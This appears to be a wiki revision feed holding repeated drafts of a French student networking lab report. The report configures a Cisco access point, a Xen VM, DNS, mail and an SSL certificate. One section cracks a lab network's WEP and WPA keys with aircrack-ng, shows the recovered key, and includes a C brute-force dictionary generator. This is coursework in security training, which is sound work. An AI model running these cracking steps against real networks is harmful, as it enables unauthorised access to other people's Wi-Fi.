&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
mettre serveur messagerie &lt;br /&gt;
demander certificat&lt;br /&gt;
&lt;br /&gt;
securisation wifi &lt;br /&gt;
WPA-EAP&lt;/div&gt;</summary>
		<author><name>Mstrunc</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=23104</id>
		<title>TP sysres IMA2a5 2015/2016 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=23104"/>
				<updated>2015-11-20T11:21:08Z</updated>
		
		<summary type="html">&lt;p&gt;Mstrunc : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;h1&amp;gt;Projet Système &amp;amp; Réseaux  IMA2A S9 &amp;lt;/h1&amp;gt;&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;h2&amp;gt;Partie I - Configuration du point d’accès&amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;a) Restriction par adresse MAC &amp;lt;/h4&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nom&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;adresse MAC&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7::19:f3&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e6:ed:b1&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:22:43:43:e7:7d&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7:64:03&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On récupère les adresses mac comme ci dessous.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@heron:~$ su&lt;br /&gt;
Mot de passe : &lt;br /&gt;
root@heron:/home/pifou# ifconfig &lt;br /&gt;
lo        Link encap:Boucle locale  &lt;br /&gt;
          inet adr:127.0.0.1  Masque:255.0.0.0&lt;br /&gt;
          adr inet6: ::1/128 Scope:Hôte&lt;br /&gt;
          UP LOOPBACK RUNNING  MTU:65536  Metric:1&lt;br /&gt;
          RX packets:2348 errors:0 dropped:0 overruns:0 frame:0&lt;br /&gt;
          TX packets:2348 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 lg file transmission:0 &lt;br /&gt;
          RX bytes:244556 (238.8 KiB)  TX bytes:244556 (238.8 KiB)&lt;br /&gt;
&lt;br /&gt;
wlan0     Link encap:Ethernet  HWaddr 00:22:43:43:e7:7d  &lt;br /&gt;
          inet adr:172.26.79.61  Bcast:172.26.79.255  Masque:255.255.240.0&lt;br /&gt;
          adr inet6: fe80::222:43ff:fe43:e77d/64 Scope:Lien&lt;br /&gt;
          adr inet6: 2001:660:4401:6006:222:43ff:fe43:e77d/64 Scope:Global&lt;br /&gt;
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1&lt;br /&gt;
          RX packets:12046 errors:0 dropped:1471 overruns:0 frame:0&lt;br /&gt;
          TX packets:9787 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 lg file transmission:1000 &lt;br /&gt;
          RX bytes:7742849 (7.3 MiB)  TX bytes:1442360 (1.3 MiB)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h5&amp;gt;    1) Configuration du point d’accès Cisco &amp;lt;/h5&amp;gt;&lt;br /&gt;
Conexion a la borne Cisco :&lt;br /&gt;
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@zabeth04:~$ su&lt;br /&gt;
pifou@zabeth04:~$ minicom&lt;br /&gt;
&lt;br /&gt;
// conexion au point Cisco &lt;br /&gt;
ap#enable&lt;br /&gt;
ap#Config t &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il faut autoriser les  adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#no access-list 701 deny  0000.0000.0000 ffff.ffff.ffff               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.6403  0000.0000.0000               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.19f3  0000.0000.0000&lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 deny    0000.0000.0000  ffff.ffff.ffff &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Configuration du SSID &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#dot11 ssid T2&lt;br /&gt;
ap(config-ssid)#dot11 ssid T2 &lt;br /&gt;
ap(config-ssid)#authentication open&lt;br /&gt;
ap(config-ssid)#guest-mode &lt;br /&gt;
ap(config)#interface dot11Radio0 &lt;br /&gt;
&lt;br /&gt;
ap(config-if)#ssid T2&lt;br /&gt;
ap(config-if)#encryption key 1&lt;br /&gt;
ap(config-if)#encryption key 1 size 40bit 0 01abcd1532 transmit-key&lt;br /&gt;
ap(config-if)#encryption mode Wep mandatory &lt;br /&gt;
end&lt;br /&gt;
&lt;br /&gt;
ap(config)#interface Dot11Radio0&lt;br /&gt;
ap(config-if)#no shutdown&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour voir si des machines sont connecté sur le point d’accès  &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
sh do11 associations&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h5&amp;gt;    1) Configuration du Wifi sur l'eeePC &amp;lt;/h5&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Configuration:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@heron:/home/pifou# cat /etc/network/interfaces&lt;br /&gt;
source /etc/network/interfaces.d/*&lt;br /&gt;
&lt;br /&gt;
# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# Ethernet interface&lt;br /&gt;
#auto eth0&lt;br /&gt;
#iface eth0 inet static&lt;br /&gt;
#  address 172.26.79.241&lt;br /&gt;
#  netmask 255.255.240.0&lt;br /&gt;
#  gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
auto wlan0&lt;br /&gt;
iface wlan0 inet static&lt;br /&gt;
	wireless-mode managed&lt;br /&gt;
	wireless-essid T2&lt;br /&gt;
	wireless-key 1111111111&lt;br /&gt;
	address 172.26.79.61&lt;br /&gt;
	netmask 255.255.240.0&lt;br /&gt;
	gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
conexion au PA&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ifup wlan0&lt;br /&gt;
iwconfig wlan0 essid T2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
on est bien connecté :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
wlan0     IEEE 802.11bgn  ESSID:&amp;quot;T2&amp;quot;  &lt;br /&gt;
          Mode:Managed  Frequency:2.447 GHz  Access Point: C4:14:3C:12:EA:00   &lt;br /&gt;
          Bit Rate=54 Mb/s   Tx-Power=20 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Encryption key:1111-1111-11&lt;br /&gt;
          Power Management:off&lt;br /&gt;
          Link Quality=70/70  Signal level=-38 dBm  &lt;br /&gt;
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
          Tx excessive retries:0  Invalid misc:4104   Missed beacon:0&lt;br /&gt;
&lt;br /&gt;
lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Partie II - Installation de la machine virtuel &amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// Conexion au serveur &lt;br /&gt;
ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
// Création de la Machine virtuel ( nom : chien)&lt;br /&gt;
xen-create-image --hostname chien --ip 193.48.57.181 --dir /usr/local/xen&lt;br /&gt;
&lt;br /&gt;
// On observe la virtualisation&lt;br /&gt;
tail -f /var/log/xen-tools/chien.log&lt;br /&gt;
&lt;br /&gt;
root@cordouan:~# cd /etc/xen/&lt;br /&gt;
root@cordouan:/etc/xen# vim chien.cfg &lt;br /&gt;
// on met plus de memoire  =&amp;gt; 1024&lt;br /&gt;
// conexion en mode bridge=IMA2a&lt;br /&gt;
&lt;br /&gt;
root@cordouan:/etc/xen# xl list&lt;br /&gt;
root@cordouan:/etc/xen# xl create chien.cfg&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
connexion à notre MV:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
root@cordouan:/etc/xen# xl console chien&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
/etc/ssh/sshd_config&lt;br /&gt;
PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
if down eth0 &lt;br /&gt;
ifup etho&lt;br /&gt;
apt-get purge network-manage systemd &lt;br /&gt;
/etc/inittable&lt;br /&gt;
// fin ligne tty0 ==&amp;gt; hvc0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// Configuration de eth0&lt;br /&gt;
# The primary network interface&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.181&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 gatway 193.48.57.190&lt;br /&gt;
&lt;br /&gt;
root@chien:~# ifdown eth0 &lt;br /&gt;
root@chien:~# ifup eth0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Serveur DNS&lt;br /&gt;
modification du fichier /var/cache/bind option&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
nano /etc/bind/named.conf.options &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
   59  apt-get install vim strace tcpdump &lt;br /&gt;
   60  apt-get install host&lt;br /&gt;
   61  host -t ni love-in-the-world.space&lt;br /&gt;
   62  host -t any love-in-the-world.space&lt;br /&gt;
   68  vim named.conf.options &lt;br /&gt;
   69  cp db.local db.love-in-the-world&lt;br /&gt;
   70  cat named.conf.default-zones &lt;br /&gt;
   71  vim named.conf.local &lt;br /&gt;
   73  vim db.love-in-the-world &lt;br /&gt;
   service bind9 stop&lt;br /&gt;
   76  service bind9 start&lt;br /&gt;
   77  cat /var/log/daemon.log&lt;br /&gt;
   78  vim db.love-in-the-world &lt;br /&gt;
   service bind9 stop&lt;br /&gt;
   vim db.love-in-the-world &lt;br /&gt;
   service bind9 start&lt;br /&gt;
   cat /var/log/daemon.log&lt;br /&gt;
   cat /var/log/daemon.log&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;Recuperation du certificat SSL&amp;lt;/h4&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Instalation et Configuration de la boite Mail &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 apt-get install postfix bsd-mailx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
configuration de la boite mail &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 #nano /etc/aliases&lt;br /&gt;
   postmaster:    root&lt;br /&gt;
   admin: root&lt;br /&gt;
 &lt;br /&gt;
 #newaliases&lt;br /&gt;
 #mailx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Je m'envoi un mail pour verifier le bon fonctionement de la boite mail &lt;br /&gt;
E-mail: admin@love-in-the-world.space&lt;br /&gt;
&lt;br /&gt;
Verfification:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#mailx&lt;br /&gt;
From Maxime.Strunc@polytech-lille.net  Fri Nov 20 13:22:24 2015&lt;br /&gt;
Return-Path: &amp;lt;Maxime.Strunc@polytech-lille.net&amp;gt;&lt;br /&gt;
X-Original-To: admin@love-in-the-world.space&lt;br /&gt;
Delivered-To: admin@love-in-the-world.space&lt;br /&gt;
Received: from peronne.escaut.net (peronne.escaut.net [193.48.57.26])&lt;br /&gt;
	by chien (Postfix) with ESMTP id E7DA93421F&lt;br /&gt;
	for &amp;lt;admin@love-in-the-world.space&amp;gt;; Fri, 20 Nov 2015 13:22:24 +0100 (CET)&lt;br /&gt;
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr&lt;br /&gt;
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr&lt;br /&gt;
Received: from webmailportal.polytech-lille.fr (hirson.escaut.net [193.48.57.37])&lt;br /&gt;
	(Authenticated sender: mstrunc)&lt;br /&gt;
	by peronne.escaut.net (Postfix) with ESMTPA id 305081C38&lt;br /&gt;
	for &amp;lt;admin@love-in-the-world.space&amp;gt;; Fri, 20 Nov 2015 11:33:52 +0100 (CET)&lt;br /&gt;
MIME-Version: 1.0&lt;br /&gt;
Content-Type: text/plain; charset=UTF-8;&lt;br /&gt;
 format=flowed&lt;br /&gt;
Content-Transfer-Encoding: 7bit&lt;br /&gt;
Date: Fri, 20 Nov 2015 11:33:52 +0100&lt;br /&gt;
From: Maxime Strunc &amp;lt;Maxime.Strunc@polytech-lille.net&amp;gt;&lt;br /&gt;
To: &amp;lt;admin@love-in-the-world.space&amp;gt;&lt;br /&gt;
Subject: Hello&lt;br /&gt;
Message-ID: &amp;lt;478f6b7d2da9875c32551984f2b92f9f@polytech-lille.net&amp;gt;&lt;br /&gt;
X-Sender: Maxime.Strunc@polytech-lille.net&lt;br /&gt;
User-Agent: Roundcube Webmail/0.7.2&lt;br /&gt;
Status: RO&lt;br /&gt;
&lt;br /&gt;
Hey it's working&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
- Recupération du Certificat:&lt;br /&gt;
Je vais sur Gandi.net&lt;br /&gt;
&lt;br /&gt;
génération de la CSR&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@chien:~#   openssl req -nodes -newkey rsa:2048 -sha256 -keyout chien.key -out chien.csr&lt;br /&gt;
// Il ya plusieurs informations à rentrer, il y en a une très important : c'et le mail : &lt;br /&gt;
admin@love-in-the-world.space&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
apres avoir renseigner tout les champs, &lt;br /&gt;
j'obtient la CSR: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
       ... texte crypter...&lt;br /&gt;
-----END CERTIFICATE REQUEST-----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Je la copie dans l'emplacement voulue sur gandi.net&lt;br /&gt;
&lt;br /&gt;
Gandi m'envoi un mail a l'adresse informée &amp;quot;admin@love-in-the-world.space&amp;quot;&lt;br /&gt;
Il faut donc clique sur un lien de confimation et entrer la cles fournit dans le mail.&lt;br /&gt;
Une fois le certificat reçut, Je le copie et le colle dans le chien.crt et gandi.crt&lt;br /&gt;
  &lt;br /&gt;
&amp;lt;h2&amp;gt;Partie III - Installation de Debian sur les nouvelles machines &amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Partie IV - Cassage d'une cles Wifi &amp;lt;/h2&amp;gt;&lt;br /&gt;
&amp;lt;h4&amp;gt;a) Préparation &amp;lt;/h4&amp;gt;&lt;br /&gt;
- Instalation aircrack-ng&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
apt-get install aircrack-ng firmware ralink&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
- Instalation du port usb-Wifi&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
apt-get install firmware ralink&lt;br /&gt;
airmon-ng start wlan1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;b) Cassage d'une cles WEP &amp;lt;/h4&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Je scan le reseaux Wifi: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
airodump-ng mon0 --channel 5&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
J’identifie le ssid de cracotte06 et je met les donnée  dans un fichier nommé fcracotte06&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 root@Discus:/home/pifou# airodump-ng mon0 --channel 5 --bssid 04:DA:D2:9C:50:55 -w&lt;br /&gt;
fcracotte06&lt;br /&gt;
&lt;br /&gt;
CH 5 ][ Elapsed: 0 s ][ 2015-11-20 09:05 &lt;br /&gt;
&lt;br /&gt;
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 -55 28 29 420 116 5 54e. WEP WEP cracotte06 &lt;br /&gt;
&lt;br /&gt;
BSSID STATION PWR Rate Lost Frames Probe &lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -48 36e-54e 80 456 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
La capture a donc commencé &lt;br /&gt;
&lt;br /&gt;
Dans un autre terminal:&lt;br /&gt;
Je vais analyser mon fichier de capture pour casser la cles.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ls&lt;br /&gt;
aircrack-ng fcracotte06-01.cap&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
apres quelque minutes on obtient la cles &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
                 [00:06:58] Tested 965565 keys (got 60459 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   AA(85504) EA(73728) 60(70144) 0C(69120) 33(68608) &lt;br /&gt;
    1    0/  1   AA(77824) 25(74496) BC(70400) 6C(70144) 3B(69632) &lt;br /&gt;
    2    0/  1   AA(79872) 3E(70912) 76(70400) 5C(70144) 01(68864) &lt;br /&gt;
    3    4/  5   AA(71680) FA(68608) 41(68352) 38(68096) 49(68096) &lt;br /&gt;
    4    0/  1   AA(86016) A1(70912) 80(69632) 2A(68352) 65(68352) &lt;br /&gt;
    5    0/  1   AA(85760) AF(73216) C6(71424) 5A(71168) 25(70400) &lt;br /&gt;
    6    0/  1   AA(75520) 26(70400) CB(70400) 46(69888) 1C(69632) &lt;br /&gt;
    7    0/  1   AA(83968) 18(71680) 4C(71424) 74(70144) 1E(69632) &lt;br /&gt;
    8    0/  1   AA(82176) 6F(70912) F7(70144) FB(69632) 17(68864) &lt;br /&gt;
    9    0/  3   D7(73216) 97(71168) A4(70400) BA(70144) FE(69632) &lt;br /&gt;
   10    0/  1   5F(78336) D6(72960) 46(71424) CB(68608) 8D(68352) &lt;br /&gt;
   11   13/  1   48(67072) 60(67072) F6(66816) AC(66560) 2B(66048) &lt;br /&gt;
   12    0/  1   BB(79580) A7(71096) 8B(69960) 13(69196) 68(68424) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:BB:BB:BB ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;c) Cassage d'une cles WPA&amp;lt;/h4&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
airodump-ng --encrypt wpa mon0&lt;br /&gt;
&lt;br /&gt;
# airodump-ng --encrypt wpa mon0 -c 7 --bssid 04:DA:D2:9C:50:55 -w wpacracotte06&lt;br /&gt;
&lt;br /&gt;
CH 7 ][ Elapsed: 26 mins ][ 2015-11-20 10:40 ][ WPA handshake: 04:DA:D2:9C:50:55 &lt;br /&gt;
&lt;br /&gt;
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 -70 22 9735 1905 18 7 54e. WPA2 CCMP PSK cracotte06 &lt;br /&gt;
&lt;br /&gt;
BSSID STATION PWR Rate Lost Frames Probe &lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -70 54e- 1e 904 1249 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 - creation d'un dictionaire :&lt;br /&gt;
code C:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
int main ()&lt;br /&gt;
{&lt;br /&gt;
int val=0;&lt;br /&gt;
for(val=0;val&amp;lt;99999999 ;val++)&lt;br /&gt;
{printf(&amp;quot;%08d\n&amp;quot;,val); }&lt;br /&gt;
return 0;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Compilation :&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
gcc -Wall Dictionnaire.c -o Dictionnaire&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Création :&lt;br /&gt;
On exécute le programme Dictionnaire et on renvoi les résultats dans le fichier Dico&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
./Dictionnaire &amp;gt; Dico&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Cassage de la cles: &lt;br /&gt;
après avoir récuperer le Handshake du Wifi carotte06&lt;br /&gt;
Je vais casser la clés en utilisant mon dictionnaire &amp;quot;Dico&amp;quot; le fichier &amp;quot;wpacracotte06-02.cap&amp;quot;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
mettre serveur messagerie &lt;br /&gt;
demander certificat&lt;br /&gt;
&lt;br /&gt;
securisation wifi &lt;br /&gt;
WPA-EAP&lt;/div&gt;</summary>
		<author><name>Mstrunc</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=23095</id>
		<title>TP sysres IMA2a5 2015/2016 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=23095"/>
				<updated>2015-11-20T10:21:03Z</updated>
		
		<summary type="html">&lt;p&gt;Mstrunc : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;h1&amp;gt;Projet Système &amp;amp; Réseaux  IMA2A S9 &amp;lt;/h1&amp;gt;&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;h2&amp;gt;Partie I - Configuration du point d’accès&amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;a) Restriction par adresse MAC &amp;lt;/h4&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nom&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;adresse MAC&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7::19:f3&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e6:ed:b1&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:22:43:43:e7:7d&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7:64:03&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On récupère les adresses mac comme ci dessous.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@heron:~$ su&lt;br /&gt;
Mot de passe : &lt;br /&gt;
root@heron:/home/pifou# ifconfig &lt;br /&gt;
lo        Link encap:Boucle locale  &lt;br /&gt;
          inet adr:127.0.0.1  Masque:255.0.0.0&lt;br /&gt;
          adr inet6: ::1/128 Scope:Hôte&lt;br /&gt;
          UP LOOPBACK RUNNING  MTU:65536  Metric:1&lt;br /&gt;
          RX packets:2348 errors:0 dropped:0 overruns:0 frame:0&lt;br /&gt;
          TX packets:2348 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 lg file transmission:0 &lt;br /&gt;
          RX bytes:244556 (238.8 KiB)  TX bytes:244556 (238.8 KiB)&lt;br /&gt;
&lt;br /&gt;
wlan0     Link encap:Ethernet  HWaddr 00:22:43:43:e7:7d  &lt;br /&gt;
          inet adr:172.26.79.61  Bcast:172.26.79.255  Masque:255.255.240.0&lt;br /&gt;
          adr inet6: fe80::222:43ff:fe43:e77d/64 Scope:Lien&lt;br /&gt;
          adr inet6: 2001:660:4401:6006:222:43ff:fe43:e77d/64 Scope:Global&lt;br /&gt;
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1&lt;br /&gt;
          RX packets:12046 errors:0 dropped:1471 overruns:0 frame:0&lt;br /&gt;
          TX packets:9787 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 lg file transmission:1000 &lt;br /&gt;
          RX bytes:7742849 (7.3 MiB)  TX bytes:1442360 (1.3 MiB)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h5&amp;gt;    1) Configuration du point d’accès Cisco &amp;lt;/h5&amp;gt;&lt;br /&gt;
Conexion a la borne Cisco :&lt;br /&gt;
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@zabeth04:~$ su&lt;br /&gt;
pifou@zabeth04:~$ minicom&lt;br /&gt;
&lt;br /&gt;
// conexion au point Cisco &lt;br /&gt;
ap#enable&lt;br /&gt;
ap#Config t &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
